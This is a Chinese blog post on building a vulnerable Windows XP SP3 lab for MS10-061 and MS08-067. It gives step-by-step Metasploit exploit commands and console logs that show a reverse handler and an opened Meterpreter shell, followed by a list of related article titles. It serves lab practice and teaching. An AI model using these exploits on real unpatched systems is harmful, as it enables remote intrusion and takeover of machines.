MS10-061靶机搭建环境网上并没找到什么资料,做一个总结,为大家提供参考:

MS10-061:​打印后台程序服务中可能允许远程执行代码漏洞

准备环境:

VMware

WINDOWS XP SP3 原版镜像,不能打过补丁

下载地址:

http://pan.baidu.com/s/1kT7veCZ

1、安装完成后,在控制面板中的---打印机和传真---下有默认的Microsoft打印机,但好像并不好用(可以尝试下直接改属性---端口为COM1试试)。

2、VMware提供虚拟打印机,在com1口。

3、删掉了默认的打印机(自愿),然后,添加打印机---连接到次计算机的本地打印机(去掉勾选的自动检测)---COM1口(VMware中查看即可)---打印机厂商默认即可---打印机名---共享---位置随意可不填

4、重启print Spooler服务(不重启可能导致meta连接打印机失败)

5、保存一个快照(便于恢复环境和下面的漏洞的测试)

6、攻击PC启动metasploit---

7、use exploit/windows/smb/ms10_061_spoolss

8、set RHOST 目标ip

9、set PNAME 目标打印机name

10、exploit

此时就返回了一个

meterpreter >

MS08-067靶机环境同样没什么资料,也来个总结:

这个洞有两个端口可以利用,139和445,不废话,上步骤和实验数据:

1、上面那个环境就可以继续用,打开3个服务,Computer Browser、Server、WorkStation

2、设置一个文件夹共享,如右键 共享文档 --- 共享和安全---在网络上共享这个文件夹(共享名可以默认)---确定

3、保存快照2(这里用于方便后面的实验,由于这个洞比较有个性,所以建议保存下吧)

4、上metasploit

5、use exploit/windows/smb/ms08_067_netapi

6、set RHOST 目标ip

7、set RPORT 目标端口(445/139)

8、exploit

9、这里要说明一下这个洞为什么有个性:

本人实验发现:有时候会攻击失败,有时候又攻击成功,有时候139可以用,有时候445可以用。。。风云变幻莫测,一切规律。。看心情,但经过N2次实验总结,最终得出如下结论:

1)(猜测)这个攻击可能由于每次溢出攻击时堆栈环境不同而覆盖的返回地址有时候并不能得到预期的返回地址导致攻击失败,此时的场景多见于445端口:

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 200.200.88.179:4444

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP - Service Pack 3 - lang:Chinese - Traditional

[*] Selected Target: Windows XP SP3 Chinese - Traditional (NX)

[*] Attempting to trigger the vulnerability...

msf exploit(ms08_067_netapi) >

此时查看靶机:共享文档的共享属性没了,服务computer browser关闭了,如果等一会,桌面还会出现少许的异常变化。此时恢复快照吧

2)场景2:执行139的成功率是大于445的。尤其是对于新配置好的环境,最好先选择执行139,但第一次执行,可能出现如下问题:

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 200.200.88.179:4444

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The SMB server did not reply to our request

解决方案:

多试几次,总会回答

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 200.200.88.179:4444

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The SMB server did not reply to our request

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 200.200.88.179:4444

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The SMB server did not reply to our request

[*] Sending stage (885806 bytes) to 200.200.88.182

[*] Meterpreter session 1 opened (200.200.88.179:4444 -> 200.200.88.182:2380) at 2015-08-15 16:27:38 +0800

meterpreter >

总结:一般的,139的溢出攻击可能会更稳定一些,不会存在破坏靶机环境的问题,而445只要失败了,基本靶机服务就挂了,重启服务也可以,但不如恢复快照好。恢复后,建议先选择139端口进行攻击,多尝试几次就成功了,成功后,再尝试445,不行再恢复快照。偶尔人品好的时候,可以139、445各种轮流溢出,不好的时候,去洗洗脸吧。。

MS08067/MS10061漏洞靶机环境搭建总结相关推荐

  1. 基于CectOS7利用docker搭建Vulhub漏洞靶机环境

    基于CectOS7利用docker搭建Vulhub漏洞靶机环境 准备条件 第一步:在CentOS7上安装docker centos安装python3 安装 docker-compose docker- ...

  2. CVE-2018-1111漏洞复现-环境搭建与dhcp命令注入

    0×01 前言 2018年5月,在Red Hat Enterprise Linux多个版本的DHCP客户端软件包所包含的NetworkManager集成脚本中发现了命令注入漏洞(CVE-2018-11 ...

  3. CTFd+CTFd-whale动态靶机环境搭建

    CTFd+CTFd-whale动态靶机插件搭建 文章目录 CTFd+CTFd-whale动态靶机插件搭建 1.安装docker 2.安装docker-compose 3.Frp的配置 4.CTFd和C ...

  4. [ vulnhub靶机通关篇 ] vulnhub靶机环境搭建教程并寻找真实IP -- 以DC1为例

  5. MS08-067 漏洞靶机复现

    靶机环境搭建 Windows XP SP3 英文版下载地址: ed2k://|file|en_windows_xp_professional_with_service_pack_3_x86_cd_vl ...

  6. (环境搭建+复现)CVE-2020-1472 NetLogon 域内提权漏洞

     0x00 简介 Netlogon组件是Windows上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,还用于维护域成员与域之间.域与域控之间.域DC与跨域DC之间 ...

  7. 【网络安全学习】渗透测试篇01-DVWA靶场环境搭建教程

    渗透测试:通过经授权的模拟攻击,发现存在的漏洞,并以此对网络.主机.应用及数据的安全性进行评估. 靶场作用:在合法的环境下进行网络安全学习与演练 目录 为什么写这篇文章? 介绍及注意事项 环境搭建 1 ...

  8. 家用路由器研究详解入门(内含仿真环境搭建)

    家用路由器研究介绍 soho路由器 常见路由器品牌 家用路由器漏洞主要四个方面 WI-FI常见加密认证方式3种 WPS一键加密技术(Wi-Fi Protected Setup) 路由器密码 后门|溢出 ...

  9. docker 漏洞测试 靶机环境 靶机平台 vulhub vulapps 简介

    在实际学习中,经常需要模拟不同的漏洞环境,而使用公网的实例的话,多多少少又存在一些风险,因此能搭建一个本地的模拟环境去测试漏洞是一个不错的方案.Docker是近两年来十分流行的开源容器引擎,因此也出现 ...

最新文章

  1. Linux系统下Hadoop运行环境搭建
  2. html5新增的js api,对HTML5新增JS Api的思考
  3. 【算法竞赛学习】二手车交易价格预测-Task4建模调参
  4. 你可能不知道的Docker资源限制
  5. 加密机组会 会议纪要
  6. SpringBoot +Lombok注解精华篇
  7. 纯真IP数据库格式详解
  8. 为iOS5设计消息通知
  9. 响应式和自适应的区别
  10. tengine php环境,CentOS 7搭建tengine+php+mariadb环境并安装discuz论坛
  11. 实体词典 情感词典_情感词典
  12. 瑞星杀毒软件影响Applet无法启动的解决方法
  13. [Go] String型常用操作
  14. 在Python中将列表转换为字典的10种方法
  15. 【JS】通过JS实现超市小票打印功能——ActiveX控件
  16. Windows日志分析(上)
  17. C#--集合添加数据(ArrayList and list)
  18. 现在小屁孩黑客太牛B了
  19. Arcgis中怎么进行遥感影像的标准分幅
  20. 全国地级市1999—2020年工业企业数

热门文章

  1. uniapp自定义H5页面浏览器标签栏小图标
  2. C1. Make Nonzero Sum (easy version)【Codeforces Round #829 (Div. 2】
  3. HSDPA(High Speed Downlink Packet Access)高速下行分组接入,是一种移动通信协议,亦称为3.5G(3½G)...
  4. java web 分页详解2
  5. jsp 404错误
  6. google什么时候倒闭(搜索引擎的发展趋势)
  7. 请使用微信打开的快速解决方法
  8. unity串口 连接多个串口崩溃_什么是串口服务器 和串口转以太网模块有什么区别...
  9. 产品经理实习生面试or工作常问问题(个人的总结)
  10. E8.ITSM IT运维服务管理系统